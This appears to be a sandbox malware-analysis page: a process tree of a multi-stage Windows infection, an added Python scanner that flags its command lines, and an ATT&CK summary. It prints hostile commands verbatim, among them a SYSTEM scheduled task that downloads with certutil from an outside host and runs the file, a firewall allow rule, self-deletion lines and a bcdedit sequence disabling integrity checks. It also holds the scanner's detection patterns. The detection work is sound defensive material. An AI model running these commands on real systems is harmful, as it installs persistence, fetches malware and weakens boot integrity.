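On live telemetry, map Sysmon Event ID 1 (or an EDR's process-start record) onto ProcEvent; the parent lookup is what separates this sample's self-wipe from an operator's `ping ... & del` of a temp file, and the benign control shows that a loopback ping alone does not fire.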
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:804
-
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp12⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
PID:1328
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe"
            PID:2760
        [3] C:\Users\Admin\AppData\Roaming\1613214372547.exe
            cmdline: "C:\Users\Admin\AppData\Roaming\1613214372547.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613214372547.txt"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            PID:4084
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe"
            PID:1604
        [3] C:\Users\Admin\AppData\Roaming\1613214377312.exe
            cmdline: "C:\Users\Admin\AppData\Roaming\1613214377312.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613214377312.txt"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            PID:2132
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe"
            PID:3244
        [3] C:\Users\Admin\AppData\Roaming\1613214382562.exe
            cmdline: "C:\Users\Admin\AppData\Roaming\1613214382562.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613214382562.txt"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            PID:3820
        [3] C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
            - Executes dropped EXE
            PID:188
        [3] C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
            - Executes dropped EXE
            - Loads dropped DLL
            - Writes to the Master Boot Record (MBR)
            PID:3060
        [3] C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
            - Executes dropped EXE
            PID:4040
            [4] C:\Users\Admin\AppData\Local\Temp\is-LHR7R.tmp\23E04C4F32EF2158.tmp
                cmdline: "C:\Users\Admin\AppData\Local\Temp\is-LHR7R.tmp\23E04C4F32EF2158.tmp" /SL5="$901D8,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
                - Executes dropped EXE
                - Drops file in Program Files directory
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of FindShellTrayWindow
                PID:2192
                [5] C:\Program Files (x86)\HappyNewYear\seed.sfx.exe
                    cmdline: "C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s1
                    - Executes dropped EXE
                    - Drops file in Program Files directory
                    PID:1724
                    [6] C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                        cmdline: "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                        - Executes dropped EXE
                        - Loads dropped DLL
                        - Checks SCSI registry key(s)
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious behavior: MapViewOfSection
                        PID:3128
                [5] C:\Windows\SysWOW64\cmd.exe
                    cmdline: "cmd.exe" /c "start https://iplogger.org/14Zhe7"
                    - Checks computer location settings
                    PID:2060
        [3] C:\Windows\SysWOW64\cmd.exe
            cmdline: cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
            PID:4352
            [4] C:\Windows\SysWOW64\PING.EXE
                cmdline: ping 127.0.0.1 -n 3
                - Runs ping.exe
                PID:4396
    [2] C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
        cmdline: C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp1
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Writes to the Master Boot Record (MBR)
        - Checks SCSI registry key(s)
        - Suspicious use of WriteProcessMemory
        PID:1196
        [3] C:\Windows\SysWOW64\cmd.exe
            cmdline: cmd.exe /c taskkill /f /im chrome.exe
            - Suspicious use of WriteProcessMemory
            PID:876
            [4] C:\Windows\SysWOW64\taskkill.exe
                cmdline: taskkill /f /im chrome.exe
                - Kills process with taskkill
                PID:2832
        [3] C:\Windows\SysWOW64\cmd.exe
            cmdline: cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
            - Suspicious use of WriteProcessMemory
            PID:3992
            [4] C:\Windows\SysWOW64\PING.EXE
                cmdline: ping 127.0.0.1 -n 3
                - Runs ping.exe
                PID:1340
    [2] C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
        - Suspicious use of WriteProcessMemory
        PID:3428
        [3] C:\Windows\SysWOW64\PING.EXE
            cmdline: ping 127.0.0.1 -n 3
            - Runs ping.exe
            PID:3488
[1] C:\Windows\system32\msiexec.exe
    cmdline: C:\Windows\system32\msiexec.exe /V
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1236
    [2] C:\Windows\syswow64\MsiExec.exe
        cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0E1D733D9CA4961A31B8C2E3CA8122AC C
        - Loads dropped DLL
        PID:1356
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    - Drops file in Windows directory
    - Modifies Control Panel
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:3288
[1] C:\Windows\system32\browser_broker.exe
    cmdline: C:\Windows\system32\browser_broker.exe -Embedding
    - Modifies Internet Explorer settings
    PID:1240
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of SetWindowsHookEx
    PID:3900
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies Internet Explorer settings
    - Modifies registry class
    PID:1860
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
    PID:4748
[1] C:\Users\Admin\AppData\Local\Temp\9451.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\9451.exe
    - Executes dropped EXE
    - Adds Run key to start application
    PID:4844
    [2] C:\Windows\SysWOW64\icacls.exe
        cmdline: icacls "C:\Users\Admin\AppData\Local\1b28d49a-b6d6-4a54-ba7e-567865d12d68" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        - Modifies file permissions
        PID:5080
    [2] C:\Users\Admin\AppData\Local\Temp\9451.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\9451.exe" --Admin IsNotAutoStart IsNotTask
        - Executes dropped EXE
        PID:3192
        [3] C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin1.exe
            cmdline: "C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin1.exe"
            - Executes dropped EXE
            PID:5032
        [3] C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin2.exe
            cmdline: "C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin2.exe"
            - Executes dropped EXE
            PID:1740
        [3] C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin.exe
            cmdline: "C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin.exe"
            - Executes dropped EXE
            PID:4628
            [4] C:\Windows\SysWOW64\cmd.exe
                cmdline: /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin.exe
                PID:5000
                [5] C:\Windows\SysWOW64\timeout.exe
                    cmdline: timeout /t 3
                    - Delays execution with timeout.exe
                    PID:3888
        [3] C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\5.exe
            cmdline: "C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\5.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Checks processor information in registry
            PID:4680
            [4] C:\Windows\SysWOW64\cmd.exe
                cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\5.exe & exit
                PID:5864
                [5] C:\Windows\SysWOW64\taskkill.exe
                    cmdline: taskkill /im 5.exe /f
                    - Kills process with taskkill
                    PID:5912
[1] C:\Users\Admin\AppData\Local\Temp\9666.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\9666.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    PID:4864
    [2] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im 9666.exe /f & erase C:\Users\Admin\AppData\Local\Temp\9666.exe & exit
        PID:4692
        [3] C:\Windows\SysWOW64\taskkill.exe
            cmdline: taskkill /im 9666.exe /f
            - Kills process with taskkill
            PID:5244
[1] C:\Users\Admin\AppData\Local\Temp\9A8D.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\9A8D.exe
    - Executes dropped EXE
    PID:4884
    [2] C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9A8D.exe"
        PID:3520
        [3] C:\Windows\SysWOW64\timeout.exe
            cmdline: timeout /T 10 /NOBREAK
            - Delays execution with timeout.exe
            PID:4896
[1] C:\Users\Admin\AppData\Local\Temp\A339.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\A339.exe
    - Executes dropped EXE
    PID:5108
[1] C:\Users\Admin\AppData\Local\Temp\AB48.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\AB48.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:4496
[1] C:\Users\Admin\AppData\Local\Temp\B607.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\B607.exe
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:4948
    [2] C:\Windows\SysWOW64\WerFault.exe
        cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 2492
        - Drops file in Windows directory
        - Program crash
        PID:5136
[1] C:\Users\Admin\AppData\Local\Temp\B8A8.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\B8A8.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4988
    [2] C:\Users\Admin\AppData\Local\Temp\B8A8.exe
        cmdline: C:\Users\Admin\AppData\Local\Temp\B8A8.exe
        - Executes dropped EXE
        - Loads dropped DLL
        - Checks SCSI registry key(s)
        - Suspicious behavior: MapViewOfSection
        PID:4632
[1] C:\Users\Admin\AppData\Local\Temp\BFFC.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\BFFC.exe
    - Executes dropped EXE
    - Adds Run key to start application
    PID:5052
    [2] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        cmdline: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        - Executes dropped EXE
        PID:3908
    [2] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        cmdline: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        - Executes dropped EXE
        PID:5632
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
    PID:496
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
    PID:2604
[1] C:\Users\Admin\AppData\Local\Temp\C8A8.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\C8A8.exe
    - Executes dropped EXE
    PID:3208
    [2] C:\Users\Admin\AppData\Local\Temp\C8A8.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\C8A8.exe"
        - Executes dropped EXE
        - Windows security modification
        - Adds Run key to start application
        - Drops file in Windows directory
        PID:5748
        [3] C:\Windows\System32\cmd.exe
            cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            PID:6012
        [3] C:\Windows\rss\csrss.exe
            cmdline: C:\Windows\rss\csrss.exe /15-15
            - Executes dropped EXE
            - Modifies data under HKEY_USERS
            PID:6100
            [4] C:\Windows\SYSTEM32\schtasks.exe
                cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                - Creates scheduled task(s)
                PID:5180
            [4] C:\Windows\SYSTEM32\schtasks.exe
                cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                - Creates scheduled task(s)
                PID:1192
            [4] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                cmdline: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                - Executes dropped EXE
                - Loads dropped DLL
                PID:5292
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                    - Modifies boot configuration data using bcdedit
                    PID:4064
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                    - Modifies boot configuration data using bcdedit
                    PID:3100
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                    - Modifies boot configuration data using bcdedit
                    PID:4468
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                    - Modifies boot configuration data using bcdedit
                    PID:5432
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                    - Modifies boot configuration data using bcdedit
                    PID:5436
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                    - Modifies boot configuration data using bcdedit
                    PID:5256
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                    - Modifies boot configuration data using bcdedit
                    PID:5948
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                    - Modifies boot configuration data using bcdedit
                    PID:5892
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                    - Modifies boot configuration data using bcdedit
                    PID:6028
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                    - Modifies boot configuration data using bcdedit
                    PID:5824
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                    - Modifies boot configuration data using bcdedit
                    PID:6080
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -timeout 0
                    - Modifies boot configuration data using bcdedit
                    PID:6052
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                    - Modifies boot configuration data using bcdedit
                    PID:5768
                [5] C:\Windows\system32\bcdedit.exe
                    cmdline: C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
                    - Modifies boot configuration data using bcdedit
                    PID:6108
            [4] C:\Windows\System32\bcdedit.exe
                cmdline: C:\Windows\Sysnative\bcdedit.exe /v
                - Modifies boot configuration data using bcdedit
                PID:5296
            [4] C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                cmdline: C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                PID:5252
[1] C:\Users\Admin\AppData\Local\Temp\D0F6.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\D0F6.exe
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5336
    [2] C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\D0F6.exe"
        PID:5780
        [3] C:\Windows\SysWOW64\timeout.exe
            cmdline: timeout /T 10 /NOBREAK
            - Delays execution with timeout.exe
            PID:5828
[1] \??\c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s seclogon
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    PID:5716
[1] C:\Windows\system32\netsh.exe
    cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
    - Modifies data under HKEY_USERS
    PID:6056
[1] C:\Users\Admin\AppData\Local\Temp\24E3.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\24E3.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4372
    [2] C:\Users\Admin\AppData\Local\Temp\24E3.exe
        cmdline: C:\Users\Admin\AppData\Local\Temp\24E3.exe
        - Executes dropped EXE
        - Drops startup file
        PID:4732
        [3] C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
            cmdline: "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
            - Executes dropped EXE
            PID:5676
            [4] C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                cmdline: "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                PID:5272
[1] C:\Users\Admin\AppData\Local\Temp\2AB1.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\2AB1.exe
    - Executes dropped EXE
    PID:5144
[1] C:\Users\Admin\AppData\Local\Temp\4F12.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\4F12.exe
    PID:5784
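The command lines in this tree carry most of the run's tradecraft in plain text: self-deletion behind a ping or timeout delay, icacls denying Everyone delete rights on the dropped folder, two ONLOGON scheduled tasks at highest privilege (one of them re-downloading with certutil as SYSTEM), a firewall allow rule for a csrss.exe that lives outside System32, and a fourteen-step bcdedit sequence that builds a new OSLOADER entry with nointegritychecks set and makes it the default. The scanner below is an added example written for this page, not part of the sandbox report or its vendor's tooling. The rule names and thresholds are the editor's own; SAMPLE_CMDLINES is a constructed sample made of command lines copied from the tree above plus two benign lines for contrast. The bcdedit correlator goes beyond the single-line rules: it ties the create, set and default calls together by entry GUID, so a stray nointegritychecks on an existing entry scores differently from a freshly created default entry.

```python
"""Flag the persistence / defense-evasion command lines seen in the tree above.

Added example, not part of the sandbox report. Rule names and thresholds are
the editor's own; SAMPLE_CMDLINES is a constructed sample copied from the
process tree plus two benign lines for contrast.
"""
import re
from collections import defaultdict

# Constructed sample: command lines from the process tree above, plus two
# benign lines at the end that must not fire any rule.
SAMPLE_CMDLINES = [
    r'cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Setup.exe"',
    r'cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9A8D.exe"',
    r'"C:\Windows\System32\cmd.exe" /c taskkill /im 9666.exe /f & erase C:\Users\Admin\AppData\Local\Temp\9666.exe & exit',
    r'icacls "C:\Users\Admin\AppData\Local\1b28d49a-b6d6-4a54-ba7e-567865d12d68" /deny *S-1-1-0:(OI)(CI)(DE,DC)',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f '
    r'https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && '
    r'C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1',
    r'C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}',
    r'C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy',
    r'ping 127.0.0.1 -n 3',                                                  # benign on its own
    r'schtasks /CREATE /SC DAILY /TR "C:\Tools\backup.exe" /TN Backup /F',  # constructed, benign
]

# Single-line rules. Each regex is deliberately anchored on the option that
# makes the command malicious, not on the binary name alone.
RULES = {
    "self_delete_after_delay": re.compile(
        r"\b(?:ping\s+127\.0\.0\.1|timeout\s+/t)\b.*&.*\b(?:del|erase)\b.*\.exe", re.I),
    "self_delete_after_taskkill": re.compile(
        r"\btaskkill\b.*&.*\b(?:del|erase)\b.*\.exe", re.I),
    "icacls_deny_everyone": re.compile(
        r"\bicacls\b.*/deny\s+\*S-1-1-0", re.I),
    "schtasks_onlogon_highest": re.compile(
        r"\bschtasks\b.*/CREATE\b.*/SC\s+ONLOGON\b.*/RL\s+HIGHEST\b", re.I),
    "certutil_url_download": re.compile(
        r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*-f\s+https?://", re.I),
    "netsh_firewall_allow": re.compile(
        r"\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow\b", re.I),
    "bcdedit_integrity_checks_off": re.compile(
        r"\bbcdedit(?:\.exe)?\b.*\bnointegritychecks\s+1\b", re.I),
    "bcdedit_recovery_off": re.compile(
        r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+0\b", re.I),
    "bcdedit_legacy_boot_menu": re.compile(
        r"\bbcdedit(?:\.exe)?\b.*\bbootmenupolicy\s+legacy\b", re.I),
    # csrss.exe referenced from any directory other than System32.
    "system_binary_name_outside_system32": re.compile(
        r"(?<!system32\\)\bcsrss\.exe\b", re.I),
}

# bcdedit correlator: ties -create / -set / -default together by entry GUID.
BCD_CREATE = re.compile(
    r"\bbcdedit(?:\.exe)?\b\s+-create\s+(\{[0-9a-f-]{36}\}).*-application\s+OSLOADER", re.I)
BCD_SET = re.compile(
    r"\bbcdedit(?:\.exe)?\b\s+-set\s+(\{[0-9a-f-]{36}\})\s+(\S+)\s+(\S+)", re.I)
BCD_DEFAULT = re.compile(
    r"\bbcdedit(?:\.exe)?\b\s+-default\s+(\{[0-9a-f-]{36}\})", re.I)


def scan(cmdlines):
    """Return {rule_name: [matching command lines]} for every rule that fired."""
    hits = defaultdict(list)
    for line in cmdlines:
        for name, rx in RULES.items():
            if rx.search(line):
                hits[name].append(line)
    return dict(hits)


def correlate_bcdedit(cmdlines):
    """Per boot-entry GUID: was it created here, what was set on it, is it default."""
    entries = defaultdict(lambda: {"created": False, "settings": {}, "default": False})
    for line in cmdlines:
        if (m := BCD_CREATE.search(line)):
            entries[m.group(1).upper()]["created"] = True
        elif (m := BCD_SET.search(line)):
            entries[m.group(1).upper()]["settings"][m.group(2).lower()] = m.group(3)
        elif (m := BCD_DEFAULT.search(line)):
            entries[m.group(1).upper()]["default"] = True
    return dict(entries)


def rogue_boot_entries(cmdlines):
    """GUIDs of entries created in this run, made default, with integrity checks off."""
    return [
        guid for guid, e in correlate_bcdedit(cmdlines).items()
        if e["created"] and e["default"] and e["settings"].get("nointegritychecks") == "1"
    ]


if __name__ == "__main__":
    for name, lines in scan(SAMPLE_CMDLINES).items():
        print(f"{name}: {len(lines)} hit(s)")
    print("rogue boot entries:", rogue_boot_entries(SAMPLE_CMDLINES))
```

Feed it the cmdline column of your EDR or Sysmon event ID 1 export instead of SAMPLE_CMDLINES; the rules only need the command line, not the image path. The two bcdedit lines that score on their own (nointegritychecks 1, recoveryenabled 0) are worth an alert anywhere, but the correlator's verdict is the one that says "new default boot entry with code integrity off", which is the bootkit shape this report tags.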
Network
MITRE ATT&CK Enterprise v6

Persistence
- Bootkit (1)
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)

Defense Evasion
- Disabling Security Tools (2)
- File and Directory Permissions Modification (1)
- Impair Defenses (1)
- Install Root Certificate (1)
- Modify Registry (5)
- Web Service (1)